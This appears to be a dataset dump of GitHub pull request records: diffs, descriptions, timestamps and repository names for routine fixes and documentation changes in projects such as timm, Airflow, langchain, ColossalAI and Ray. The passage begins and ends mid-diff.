+ for sub in self.subscribers[msg]:
+ sub.run(msg)
+ self.msgQueue = []
+
+class Publisher:
+ def __init__(self, msgCenter):
+ self.provider = msgCenter
+
+ def publish(self, msg):
+ self.provider.notify(msg)
+
+
+class Subscriber:
+ def __init__(self,name,msgCenter):
+ self.name = name
+ self.provider = msgCenter
+
+ def subscribe(self, msg):
+ self.provider.subscribe(msg, self)
+
+ def run(self, msg):
+ print "%s got %s"%(self.name, msg)
+
+
+def main():
+ messageCenter = Provider()
+
+ fftv = Publisher(messageCenter)
+
+ jim = Subscriber("jim", messageCenter)
+ jim.subscribe("cartoon")
+ jack = Subscriber("jack", messageCenter)
+ jack.subscribe("music")
+ gee = Subscriber("gee", messageCenter)
+ gee.subscribe("movie")
+
+ fftv.publish("cartoon")
+ fftv.publish("music")
+ fftv.publish("ads")
+ fftv.publish("movie")
+ fftv.publish("cartoon")
+ fftv.publish("cartoon")
+ fftv.publish("movie")
+ fftv.publish("blank")
+
+ messageCenter.update()
+
+if __name__ == "__main__":
+ main()
|
Add a simple example of the publish_subscribe pattern.
|
https://api.github.com/repos/faif/python-patterns/pulls/34
|
2013-12-20T06:37:03Z
|
2013-12-26T00:37:44Z
|
2013-12-26T00:37:44Z
|
2014-07-05T21:06:08Z
| 630
|
faif/python-patterns
| 33,710
|
[Fix] Update dinov2 layerscale init values
|
diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py
index 0104e00701..b4f15cb8ba 100644
--- a/timm/models/vision_transformer.py
+++ b/timm/models/vision_transformer.py
@@ -1982,7 +1982,7 @@ def vit_small_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-S/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=384, depth=12, num_heads=6, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=384, depth=12, num_heads=6, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_small_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -1994,7 +1994,7 @@ def vit_base_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-B/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=768, depth=12, num_heads=12, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=768, depth=12, num_heads=12, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_base_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -2006,7 +2006,7 @@ def vit_large_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-L/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=1024, depth=24, num_heads=16, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=1024, depth=24, num_heads=16, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_large_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -2024,7 +2024,7 @@ def vit_giant_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
# With SwiGLUPacked, we need to set hidden_features = 2 * 4096 = 8192
model_args = dict(
- patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1.0,
+ patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5,
mlp_ratio=2.66667 * 2, mlp_layer=SwiGLUPacked, img_size=518, act_layer=nn.SiLU
)
model = _create_vision_transformer(
|
This pull request addresses the issue of incorrect initial layer scale values in DINOv2. The current values on DINOv2's torchhub are inaccurate and can cause training instability when starting from scratch (although they do not affect inference results). Therefore, I have updated the values to match those used in their training configuration.
Incorrect:
https://github.com/facebookresearch/dinov2/blob/c3c2683a13cde94d4d99f523cf4170384b00c34c/hubconf.py#L27
Correct:
https://github.com/facebookresearch/dinov2/blob/c3c2683a13cde94d4d99f523cf4170384b00c34c/dinov2/configs/ssl_default_config.yaml#L75
<details>
<summary>Validation code</summary>
```python
import timm
import torch
pairs = [
('dinov2_vits14', 'vit_small_patch14_dinov2'),
('dinov2_vitl14', 'vit_large_patch14_dinov2'),
('dinov2_vitg14', 'vit_giant_patch14_dinov2'),
]
# Fused attention will cause a slight difference in the output
timm.layers.config.set_fused_attn(enable=False)
# Use deterministic algorithms for reproducibility
torch.use_deterministic_algorithms(True)
x = torch.randn(1, 3, 518, 518)
for p0, p1 in pairs:
m0 = torch.hub.load('facebookresearch/dinov2', p0)
m0.eval()
m1 = timm.create_model(p1, pretrained=True)
m1.eval()
with torch.no_grad():
y0 = m0.forward_features(x)
y1 = m1.forward_features(x)
y0 = torch.cat([y0["x_norm_clstoken"][:, None], y0["x_norm_patchtokens"]], dim=1)
absolute_error = torch.abs(y0 - y1).mean()
print(f"{p0} error: {absolute_error:.8f}")
assert absolute_error <= 1e-6, f"{p0} check failed"
```
```txt
dinov2_vits14 error: 0.00000000
dinov2_vitl14 error: 0.00000000
dinov2_vitg14 error: 0.00000000
```
</details>
|
https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1823
|
2023-05-24T16:24:21Z
|
2023-05-25T00:40:45Z
|
2023-05-25T00:40:45Z
|
2023-05-25T00:40:45Z
| 709
|
huggingface/pytorch-image-models
| 16,374
|
Update books.md
|
diff --git a/books.md b/books.md
index 9721d55b..8fee91ef 100644
--- a/books.md
+++ b/books.md
@@ -74,7 +74,6 @@ The following is a list of free, open source books on machine learning, statisti
* [Introduction to Probability](http://athenasc.com/probbook.html) - Book and course by MIT
* [The Elements of Statistical Learning: Data Mining, Inference, and Prediction.](http://statweb.stanford.edu/~tibs/ElemStatLearn/) - Book
* [An Introduction to Statistical Learning with Applications in R](http://www-bcf.usc.edu/~gareth/ISL/) - Book
-* [Learning Statistics Using R](http://health.adelaide.edu.au/psychology/ccs/teaching/lsr/)
* [Introduction to Probability and Statistics Using R](https://cran.r-project.org/web/packages/IPSUR/vignettes/IPSUR.pdf) - Book
* [Advanced R Programming](http://adv-r.had.co.nz) - Book
* [Practical Regression and Anova using R](http://cran.r-project.org/doc/contrib/Faraway-PRA.pdf) - Book
|
The link for "Learning statistics using R" is invalid. I could not find a PDF link online.
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/460
|
2017-12-15T23:18:11Z
|
2017-12-17T19:30:05Z
|
2017-12-17T19:30:05Z
|
2017-12-18T09:25:37Z
| 262
|
josephmisiti/awesome-machine-learning
| 52,534
|
fix_jpeg_live_preview
|
diff --git a/modules/shared_state.py b/modules/shared_state.py
index 33996691c40..759a47481ff 100644
--- a/modules/shared_state.py
+++ b/modules/shared_state.py
@@ -162,5 +162,7 @@ def do_set_current_image(self):
errors.record_exception()
def assign_current_image(self, image):
+ if shared.opts.live_previews_image_format == 'jpeg' and image.mode == 'RGBA':
+ image = image.convert('RGB')
self.current_image = image
self.id_live_preview += 1
|
## Description
If the user sets the live preview format to jpeg in the settings, an RGBA-related error is produced whenever any extension uses the live preview
- https://github.com/light-and-ray/sd-webui-lama-cleaner-masked-content/issues/4
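A minimal standalone reproduction sketch of why the conversion is needed (outside the webui, using Pillow directly):
```python
from PIL import Image

image = Image.new("RGBA", (64, 64))

# JPEG has no alpha channel, so saving an RGBA image raises
# "OSError: cannot write mode RGBA as JPEG".
try:
    image.save("preview.jpg", format="JPEG")
except OSError:
    # The fix applied in assign_current_image: drop the alpha channel first.
    image.convert("RGB").save("preview.jpg", format="JPEG")
```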
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/15102
|
2024-03-03T12:57:01Z
|
2024-03-04T07:30:24Z
|
2024-03-04T07:30:24Z
|
2024-03-04T07:43:18Z
| 124
|
AUTOMATIC1111/stable-diffusion-webui
| 39,979
|
Create convert celsius into fahrenheit
|
diff --git a/convert celsius into fahrenheit b/convert celsius into fahrenheit
new file mode 100644
index 0000000000..df58fcda9d
--- /dev/null
+++ b/convert celsius into fahrenheit
@@ -0,0 +1,4 @@
+cels = float(input("enter temp in celsius: "))
+print("temperature in celsius is:", cels)
+fahr = cels * 9 / 5 + 32
+print("temperature in fahrenheit is:", fahr)
|
Using this code we can easily convert Celsius into Fahrenheit.
|
https://api.github.com/repos/geekcomputers/Python/pulls/1020
|
2020-10-05T11:00:55Z
|
2020-10-10T20:20:24Z
|
2020-10-10T20:20:24Z
|
2020-10-10T20:20:24Z
| 121
|
geekcomputers/Python
| 31,661
|
Update README.md
|
diff --git a/README.md b/README.md
index fb96fc0a9..08a50cb70 100755
--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@ We are unlocking the power of large language models. Our latest version of Llama
This release includes model weights and starting code for pretrained and fine-tuned Llama language models — ranging from 7B to 70B parameters.
-This repository is intended as a minimal example to load [Llama 2](https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/) models and run inference. For more detailed examples leveraging HuggingFace, see [llama-recipes](https://github.com/facebookresearch/llama-recipes/).
+This repository is intended as a minimal example to load [Llama 2](https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/) models and run inference. For more detailed examples leveraging Hugging Face, see [llama-recipes](https://github.com/facebookresearch/llama-recipes/).
## Download
|
HuggingFace -> Hugging Face
|
https://api.github.com/repos/meta-llama/llama/pulls/492
|
2023-07-22T05:48:01Z
|
2023-08-31T19:37:44Z
|
2023-08-31T19:37:44Z
|
2023-08-31T19:37:44Z
| 258
|
meta-llama/llama
| 31,958
|
textgen-silence-output-feature in terminal
|
diff --git a/libs/langchain/langchain/llms/textgen.py b/libs/langchain/langchain/llms/textgen.py
index 5f83dc08b96c91..6b409ecb12f692 100644
--- a/libs/langchain/langchain/llms/textgen.py
+++ b/libs/langchain/langchain/llms/textgen.py
@@ -208,7 +208,6 @@ def _call(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
combined_text_output += chunk.text
- print(prompt + combined_text_output)
result = combined_text_output
else:
@@ -220,7 +219,6 @@ def _call(
if response.status_code == 200:
result = response.json()["results"][0]["text"]
- print(prompt + result)
else:
print(f"ERROR: response: {response}")
result = ""
@@ -256,7 +254,6 @@ async def _acall(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
combined_text_output += chunk.text
- print(prompt + combined_text_output)
result = combined_text_output
else:
@@ -268,7 +265,6 @@ async def _acall(
if response.status_code == 200:
result = response.json()["results"][0]["text"]
- print(prompt + result)
else:
print(f"ERROR: response: {response}")
result = ""
|
Hello,
Added the new feature to silence TextGen's output in the terminal.
- Description: Added a new feature to control printing of TextGen's output to the terminal.
- Issue: fixes #10337 (TextGen parameter to silence the print in terminal)
Thanks!
|
https://api.github.com/repos/langchain-ai/langchain/pulls/10402
|
2023-09-09T11:45:04Z
|
2023-09-11T21:20:36Z
|
2023-09-11T21:20:36Z
|
2023-09-11T21:20:36Z
| 329
|
langchain-ai/langchain
| 43,378
|
Don't try to insert queue records if no downstream dag
|
diff --git a/airflow/datasets/manager.py b/airflow/datasets/manager.py
index 2b009c1b09f23..83539d596540d 100644
--- a/airflow/datasets/manager.py
+++ b/airflow/datasets/manager.py
@@ -61,7 +61,9 @@ def register_dataset_change(
extra=extra,
)
)
- self._queue_dagruns(dataset_model, session)
+ if dataset_model.consuming_dags:
+ self._queue_dagruns(dataset_model, session)
+ session.flush()
def _queue_dagruns(self, dataset: DatasetModel, session: Session) -> None:
# Possible race condition: if multiple dags or multiple (usually
@@ -91,8 +93,6 @@ def _slow_path_queue_dagruns(self, dataset: DatasetModel, session: Session) -> N
except exc.IntegrityError:
self.log.debug("Skipping record %s", item, exc_info=True)
- session.flush()
-
def _postgres_queue_dagruns(self, dataset: DatasetModel, session: Session) -> None:
from sqlalchemy.dialects.postgresql import insert
@@ -101,7 +101,6 @@ def _postgres_queue_dagruns(self, dataset: DatasetModel, session: Session) -> No
stmt,
[{'target_dag_id': target_dag.dag_id} for target_dag in dataset.consuming_dags],
)
- session.flush()
def resolve_dataset_manager() -> "DatasetManager":
diff --git a/tests/datasets/test_manager.py b/tests/datasets/test_manager.py
index 4ff3b2884740b..42dffd76a11fd 100644
--- a/tests/datasets/test_manager.py
+++ b/tests/datasets/test_manager.py
@@ -80,3 +80,17 @@ def test_register_dataset_change(self, session, dag_maker, mock_task_instance):
# Ensure we've created a dataset
assert session.query(DatasetEvent).filter_by(dataset_id=dsm.id).count() == 1
assert session.query(DatasetDagRunQueue).count() == 2
+
+ def test_register_dataset_change_no_downstreams(self, session, mock_task_instance):
+ dsem = DatasetManager()
+
+ ds = Dataset(uri="never_consumed")
+ dsm = DatasetModel(uri="never_consumed")
+ session.add(dsm)
+ session.flush()
+
+ dsem.register_dataset_change(task_instance=mock_task_instance, dataset=ds, session=session)
+
+ # Ensure we've created a dataset
+ assert session.query(DatasetEvent).filter_by(dataset_id=dsm.id).count() == 1
+ assert session.query(DatasetDagRunQueue).count() == 0
|
https://api.github.com/repos/apache/airflow/pulls/26257
|
2022-09-09T02:18:54Z
|
2022-09-09T13:04:17Z
|
2022-09-09T13:04:17Z
|
2022-09-12T15:57:04Z
| 611
|
apache/airflow
| 14,566
|
|
[doc] add feature diffusion v2, bloom, auto-parallel
|
diff --git a/README-zh-Hans.md b/README-zh-Hans.md
index 57cf90586004..ec9014deb361 100644
--- a/README-zh-Hans.md
+++ b/README-zh-Hans.md
@@ -38,12 +38,12 @@
<li>
<a href="#并行训练样例展示">并行训练样例展示</a>
<ul>
- <li><a href="#ViT">ViT</a></li>
<li><a href="#GPT-3">GPT-3</a></li>
<li><a href="#GPT-2">GPT-2</a></li>
<li><a href="#BERT">BERT</a></li>
<li><a href="#PaLM">PaLM</a></li>
<li><a href="#OPT">OPT</a></li>
+ <li><a href="#ViT">ViT</a></li>
<li><a href="#推荐系统模型">推荐系统模型</a></li>
</ul>
</li>
@@ -59,6 +59,7 @@
<ul>
<li><a href="#GPT-3-Inference">GPT-3</a></li>
<li><a href="#OPT-Serving">1750亿参数OPT在线推理服务</a></li>
+ <li><a href="#BLOOM-Inference">1750亿参数 BLOOM</a></li>
</ul>
</li>
<li>
@@ -102,6 +103,7 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
- 1维, [2维](https://arxiv.org/abs/2104.05343), [2.5维](https://arxiv.org/abs/2105.14500), [3维](https://arxiv.org/abs/2105.14450) 张量并行
- [序列并行](https://arxiv.org/abs/2105.13120)
- [零冗余优化器 (ZeRO)](https://arxiv.org/abs/1910.02054)
+ - [自动并行](https://github.com/hpcaitech/ColossalAI/tree/main/examples/language/gpt/auto_parallel_with_gpt)
- 异构内存管理
- [PatrickStar](https://arxiv.org/abs/2108.05818)
- 使用友好
@@ -113,12 +115,7 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
<p align="right">(<a href="#top">返回顶端</a>)</p>
## 并行训练样例展示
-### ViT
-<p align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
-</p>
-- 14倍批大小和5倍训练速度(张量并行=64)
### GPT-3
<p align="center">
@@ -153,6 +150,12 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
请访问我们的 [文档](https://www.colossalai.org/) 和 [例程](https://github.com/hpcaitech/ColossalAI-Examples) 以了解详情。
+### ViT
+<p align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
+</p>
+
+- 14倍批大小和5倍训练速度(张量并行=64)
### 推荐系统模型
- [Cached Embedding](https://github.com/hpcaitech/CachedEmbedding), 使用软件Cache实现Embeddings,用更少GPU显存训练更大的模型。
@@ -199,23 +202,38 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
- [OPT推理服务](https://service.colossalai.org/opt): 无需注册,免费体验1750亿参数OPT在线推理服务
+<p id="BLOOM-Inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/BLOOM%20Inference.PNG" width=800/>
+</p>
+
+- [BLOOM](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): 降低1750亿参数BLOOM模型部署推理成本超10倍
<p align="right">(<a href="#top">返回顶端</a>)</p>
## Colossal-AI 成功案例
### AIGC
-加速AIGC(AI内容生成)模型,如[Stable Diffusion](https://github.com/CompVis/stable-diffusion)
+加速AIGC(AI内容生成)模型,如[Stable Diffusion v1](https://github.com/CompVis/stable-diffusion) 和 [Stable Diffusion v2](https://github.com/Stability-AI/stablediffusion)
+
<p id="diffusion_train" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_train.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20v2.png" width=800/>
</p>
-- [Colossal-AI优化Stable Diffusion](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 6.5倍训练加速和预训练成本降低, 微调硬件成本下降约7倍(从RTX3090/4090到RTX3050/2070)
+- [训练](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 减少5.6倍显存消耗,硬件成本最高降低46倍(从A100到RTX3060)
<p id="diffusion_demo" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_demo.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/DreamBooth.png" width=800/>
</p>
+- [DreamBooth微调](https://github.com/hpcaitech/ColossalAI/tree/hotfix/doc/examples/images/dreambooth): 仅需3-5张目标主题图像个性化微调
+
+<p id="inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20Inference.jpg" width=800/>
+</p>
+
+- [推理](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): GPU推理显存消耗降低2.5倍
+
+
<p align="right">(<a href="#top">返回顶端</a>)</p>
### 生物医药
diff --git a/README.md b/README.md
index 36d5c2e820b6..c58ad5e5c4ee 100644
--- a/README.md
+++ b/README.md
@@ -38,12 +38,12 @@
<li>
<a href="#Parallel-Training-Demo">Parallel Training Demo</a>
<ul>
- <li><a href="#ViT">ViT</a></li>
<li><a href="#GPT-3">GPT-3</a></li>
<li><a href="#GPT-2">GPT-2</a></li>
<li><a href="#BERT">BERT</a></li>
<li><a href="#PaLM">PaLM</a></li>
<li><a href="#OPT">OPT</a></li>
+ <li><a href="#ViT">ViT</a></li>
<li><a href="#Recommendation-System-Models">Recommendation System Models</a></li>
</ul>
</li>
@@ -59,6 +59,7 @@
<ul>
<li><a href="#GPT-3-Inference">GPT-3</a></li>
<li><a href="#OPT-Serving">OPT-175B Online Serving for Text Generation</a></li>
+ <li><a href="#BLOOM-Inference">175B BLOOM</a></li>
</ul>
</li>
<li>
@@ -104,6 +105,7 @@ distributed training and inference in a few lines.
- 1D, [2D](https://arxiv.org/abs/2104.05343), [2.5D](https://arxiv.org/abs/2105.14500), [3D](https://arxiv.org/abs/2105.14450) Tensor Parallelism
- [Sequence Parallelism](https://arxiv.org/abs/2105.13120)
- [Zero Redundancy Optimizer (ZeRO)](https://arxiv.org/abs/1910.02054)
+ - [Auto-Parallelism](https://github.com/hpcaitech/ColossalAI/tree/main/examples/language/gpt/auto_parallel_with_gpt)
- Heterogeneous Memory Management
- [PatrickStar](https://arxiv.org/abs/2108.05818)
@@ -119,12 +121,6 @@ distributed training and inference in a few lines.
<p align="right">(<a href="#top">back to top</a>)</p>
## Parallel Training Demo
-### ViT
-<p align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
-</p>
-
-- 14x larger batch size, and 5x faster training for Tensor Parallelism = 64
### GPT-3
<p align="center">
@@ -158,6 +154,13 @@ distributed training and inference in a few lines.
Please visit our [documentation](https://www.colossalai.org/) and [examples](https://github.com/hpcaitech/ColossalAI-Examples) for more details.
+### ViT
+<p align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
+</p>
+
+- 14x larger batch size, and 5x faster training for Tensor Parallelism = 64
+
### Recommendation System Models
- [Cached Embedding](https://github.com/hpcaitech/CachedEmbedding), utilize software cache to train larger embedding tables with a smaller GPU memory budget.
@@ -202,22 +205,37 @@ Please visit our [documentation](https://www.colossalai.org/) and [examples](htt
- [OPT Serving](https://service.colossalai.org/opt): Try 175-billion-parameter OPT online services for free, without any registration whatsoever.
+<p id="BLOOM-Inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/BLOOM%20Inference.PNG" width=800/>
+</p>
+
+- [BLOOM](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): Reduce hardware deployment costs of 175-billion-parameter BLOOM by more than 10 times.
+
<p align="right">(<a href="#top">back to top</a>)</p>
## Colossal-AI in the Real World
### AIGC
-Acceleration of AIGC (AI-Generated Content) models such as [Stable Diffusion](https://github.com/CompVis/stable-diffusion)
+Acceleration of AIGC (AI-Generated Content) models such as [Stable Diffusion v1](https://github.com/CompVis/stable-diffusion) and [Stable Diffusion v2](https://github.com/Stability-AI/stablediffusion).
<p id="diffusion_train" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_train.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20v2.png" width=800/>
</p>
-- [Stable Diffusion with Colossal-AI](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): 6.5x faster training and pretraining cost saving, the hardware cost of fine-tuning can be almost 7X cheaper (from RTX3090/4090 to RTX3050/2070)
+- [Training](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion): Reduce Stable Diffusion memory consumption by up to 5.6x and hardware cost by up to 46x (from A100 to RTX3060).
<p id="diffusion_demo" align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/diffusion_demo.png" width=800/>
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/DreamBooth.png" width=800/>
</p>
+- [DreamBooth Fine-tuning](https://github.com/hpcaitech/ColossalAI/tree/hotfix/doc/examples/images/dreambooth): Personalize your model using just 3-5 images of the desired subject.
+
+<p id="inference" align="center">
+<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/Stable%20Diffusion%20Inference.jpg" width=800/>
+</p>
+
+- [Inference](https://github.com/hpcaitech/EnergonAI/tree/main/examples/bloom): Reduce inference GPU memory consumption by 2.5x.
+
+
<p align="right">(<a href="#top">back to top</a>)</p>
### Biomedicine
|
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2282
|
2023-01-03T09:20:36Z
|
2023-01-03T09:35:07Z
|
2023-01-03T09:35:07Z
|
2023-01-03T09:39:55Z
| 3,233
|
hpcaitech/ColossalAI
| 11,158
|
|
[grpc] refactor rpc server to support multiple io services
|
diff --git a/src/ray/raylet/node_manager.cc b/src/ray/raylet/node_manager.cc
index a0bde1ff0655f..08f5b36208708 100644
--- a/src/ray/raylet/node_manager.cc
+++ b/src/ray/raylet/node_manager.cc
@@ -100,7 +100,8 @@ NodeManager::NodeManager(boost::asio::io_service &io_service,
gcs_client_->raylet_task_table(), gcs_client_->raylet_task_table(),
config.max_lineage_size),
actor_registry_(),
- node_manager_server_(config.node_manager_port, io_service, *this),
+ node_manager_server_("NodeManager", config.node_manager_port),
+ node_manager_service_(io_service, *this),
client_call_manager_(io_service) {
RAY_CHECK(heartbeat_period_.count() > 0);
// Initialize the resource map with own cluster resource configuration.
@@ -118,6 +119,7 @@ NodeManager::NodeManager(boost::asio::io_service &io_service,
RAY_ARROW_CHECK_OK(store_client_.Connect(config.store_socket_name.c_str()));
// Run the node manger rpc server.
+ node_manager_server_.RegisterService(node_manager_service_);
node_manager_server_.Run();
}
diff --git a/src/ray/raylet/node_manager.h b/src/ray/raylet/node_manager.h
index 61613358330c8..804553d9cfd9c 100644
--- a/src/ray/raylet/node_manager.h
+++ b/src/ray/raylet/node_manager.h
@@ -506,7 +506,10 @@ class NodeManager : public rpc::NodeManagerServiceHandler {
std::unordered_map<ActorID, ActorCheckpointID> checkpoint_id_to_restore_;
/// The RPC server.
- rpc::NodeManagerServer node_manager_server_;
+ rpc::GrpcServer node_manager_server_;
+
+ /// The RPC service.
+ rpc::NodeManagerGrpcService node_manager_service_;
/// The `ClientCallManager` object that is shared by all `NodeManagerClient`s.
rpc::ClientCallManager client_call_manager_;
diff --git a/src/ray/rpc/grpc_server.cc b/src/ray/rpc/grpc_server.cc
index feb788da76923..f507039990c28 100644
--- a/src/ray/rpc/grpc_server.cc
+++ b/src/ray/rpc/grpc_server.cc
@@ -1,4 +1,5 @@
#include "ray/rpc/grpc_server.h"
+#include <grpcpp/impl/service_type.h>
namespace ray {
namespace rpc {
@@ -9,8 +10,10 @@ void GrpcServer::Run() {
grpc::ServerBuilder builder;
// TODO(hchen): Add options for authentication.
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials(), &port_);
- // Allow subclasses to register concrete services.
- RegisterServices(builder);
+ // Register all the services to this server.
+ for (auto &entry : services_) {
+ builder.RegisterService(&entry.get());
+ }
// Get hold of the completion queue used for the asynchronous communication
// with the gRPC runtime.
cq_ = builder.AddCompletionQueue();
@@ -18,8 +21,7 @@ void GrpcServer::Run() {
server_ = builder.BuildAndStart();
RAY_LOG(DEBUG) << name_ << " server started, listening on port " << port_ << ".";
- // Allow subclasses to initialize the server call factories.
- InitServerCallFactories(&server_call_factories_and_concurrencies_);
+ // Create calls for all the server call factories.
for (auto &entry : server_call_factories_and_concurrencies_) {
for (int i = 0; i < entry.second; i++) {
// Create and request calls from the factory.
@@ -31,6 +33,11 @@ void GrpcServer::Run() {
polling_thread.detach();
}
+void GrpcServer::RegisterService(GrpcService &service) {
+ services_.emplace_back(service.GetGrpcService());
+ service.InitServerCallFactories(cq_, &server_call_factories_and_concurrencies_);
+}
+
void GrpcServer::PollEventsFromCompletionQueue() {
void *tag;
bool ok;
@@ -48,7 +55,7 @@ void GrpcServer::PollEventsFromCompletionQueue() {
// incoming request.
server_call->GetFactory().CreateCall();
server_call->SetState(ServerCallState::PROCESSING);
- main_service_.post([server_call] { server_call->HandleRequest(); });
+ server_call->HandleRequest();
break;
case ServerCallState::SENDING_REPLY:
// The reply has been sent, this call can be deleted now.
diff --git a/src/ray/rpc/grpc_server.h b/src/ray/rpc/grpc_server.h
index 4953f470610fc..584da6565a47a 100644
--- a/src/ray/rpc/grpc_server.h
+++ b/src/ray/rpc/grpc_server.h
@@ -12,7 +12,9 @@
namespace ray {
namespace rpc {
-/// Base class that represents an abstract gRPC server.
+class GrpcService;
+
+/// Class that represents an gRPC server.
///
/// A `GrpcServer` listens on a specific port. It owns
/// 1) a `ServerCompletionQueue` that is used for polling events from gRPC,
@@ -28,11 +30,7 @@ class GrpcServer {
/// \param[in] name Name of this server, used for logging and debugging purpose.
/// \param[in] port The port to bind this server to. If it's 0, a random available port
/// will be chosen.
- /// \param[in] main_service The main event loop, to which service handler functions
- /// will be posted.
- GrpcServer(const std::string &name, const uint32_t port,
- boost::asio::io_service &main_service)
- : name_(name), port_(port), main_service_(main_service) {}
+ GrpcServer(const std::string &name, const uint32_t port) : name_(name), port_(port) {}
/// Destruct this gRPC server.
~GrpcServer() {
@@ -46,36 +44,25 @@ class GrpcServer {
/// Get the port of this gRPC server.
int GetPort() const { return port_; }
- protected:
- /// Subclasses should implement this method and register one or multiple gRPC services
- /// to the given `ServerBuilder`.
+ /// Register a grpc service. Multiple services can be registered to the same server.
+ /// Note that the `service` registered must remain valid for the lifetime of the
+ /// `GrpcServer`, as it holds the underlying `grpc::Service`.
///
- /// \param[in] builder The `ServerBuilder` instance to register services to.
- virtual void RegisterServices(grpc::ServerBuilder &builder) = 0;
-
- /// Subclasses should implement this method to initialize the `ServerCallFactory`
- /// instances, as well as specify maximum number of concurrent requests that gRPC
- /// server can "accept" (not "handle"). Each factory will be used to create
- /// `accept_concurrency` `ServerCall` objects, each of which will be used to accept and
- /// handle an incoming request.
- ///
- /// \param[out] server_call_factories_and_concurrencies The `ServerCallFactory` objects,
- /// and the maximum number of concurrent requests that gRPC server can accept.
- virtual void InitServerCallFactories(
- std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
- *server_call_factories_and_concurrencies) = 0;
+ /// \param[in] service A `GrpcService` to register to this server.
+ void RegisterService(GrpcService &service);
+ protected:
/// This function runs in a background thread. It keeps polling events from the
/// `ServerCompletionQueue`, and dispaches the event to the `ServiceHandler` instances
/// via the `ServerCall` objects.
void PollEventsFromCompletionQueue();
- /// The main event loop, to which the service handler functions will be posted.
- boost::asio::io_service &main_service_;
/// Name of this server, used for logging and debugging purpose.
const std::string name_;
/// Port of this server.
int port_;
+ /// The `grpc::Service` objects which should be registered to `ServerBuilder`.
+ std::vector<std::reference_wrapper<grpc::Service>> services_;
/// The `ServerCallFactory` objects, and the maximum number of concurrent requests that
/// gRPC server can accept.
std::vector<std::pair<std::unique_ptr<ServerCallFactory>, int>>
@@ -86,6 +73,46 @@ class GrpcServer {
std::unique_ptr<grpc::Server> server_;
};
+/// Base class that represents an abstract gRPC service.
+///
+/// Subclass should implement `InitServerCallFactories` to decide
+/// which kinds of requests this service should accept.
+class GrpcService {
+ public:
+ /// Constructor.
+ ///
+ /// \param[in] main_service The main event loop, to which service handler functions
+ /// will be posted.
+ GrpcService(boost::asio::io_service &main_service) : main_service_(main_service) {}
+
